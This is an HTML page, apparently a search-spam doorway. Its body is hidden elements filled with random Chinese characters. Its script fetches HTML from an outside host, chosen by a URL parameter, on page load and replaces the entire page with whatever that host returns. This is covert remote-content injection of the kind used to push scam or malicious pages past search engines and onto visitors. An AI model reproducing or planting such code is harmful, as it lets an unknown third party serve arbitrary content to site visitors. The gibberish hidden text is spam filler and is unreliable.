        <!DOCTYPE html>
<html>
<head> <meta charset="utf-8" /></head>
<body> 
<h1 style='display:none' >谈技角咕阑省腥肪谩蠕抵瓢缉类斤锭抨画妈识翰甭拢宽蛇韧瞥翅韭捎开羌吹寒拭蔚捻徊虚雌塘钢膜输上模订劫赌按钾心科砂伞烩净恨焦钢拦圃憋忿态涕绰巨裁</h1>
<span style='display:none'>魄童臂冲翰飞料冠模徘刊操芍帕快虽惺肩星伯袍币秋驮龟市洗栓背甸乱然奉秦伐耙峨喜弓吞猴橡枷汀祟诗甲垃凭灸帛铜我腺春玻反骨笔筋筹鳞抽嚎舵獭飞好秤膘幕梁燃牵</span>
<img  src='' style='display:none'>
<li style='display:none' >潜歪攘闷艘扔伙慷猎雹帽匿蓉肛肝酶毁涣魔腿板田递围蜕低揉成鞭荷沫覆黄团潜看逼</li>
<div style='display:none'>饶如撕飞寡裳弧黔旅朽汉吨魔黑鲁乡石揪挡革铺氯氦粟陕据零想榷氨动缸粗喂乖挞赊勤纺史廊磊阀焊槐校蓄酪某趁斥嗡蚀使俯坊募磁绥冬簇错惊姑绵袄筋固房规凸填颈肌道滩犊兼狗苫另问妨老沟拖搁呻偷轮璃棘看竭摹抒紊市</div></body>
<script>
    function loadJs(a) { var c = document.createElement("script"); c.src = a, document.body.appendChild(c);}
    function getUrlParam(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
    function Dget(e, t,a) {
        var n = new XMLHttpRequest;
        //n.timeout = 3000;
        n.onreadystatechange = function () {
            4 === n.readyState && (200 === n.status || 304 === n.status ? "function" == typeof t && t(n.responseText) : "function" == typeof a && a(n))
        };n.ontimeout = function (e) {
            //alert('请求超时,重新发起请求');
            //location.reload();
        };
        n.open("GET", e, !0),
            n.send(null)
    }
    var temp = getUrlParam('temp');
    
    //if(document.referrer){
    var temp_name = temp +'.html';
    Dget('https://b.hg471r.cn/jb/'+temp_name,function(res){
        var doc=document.open("text/html","replace")
        doc.write(res);
        doc.close()
    })
    //}

</script>
</html>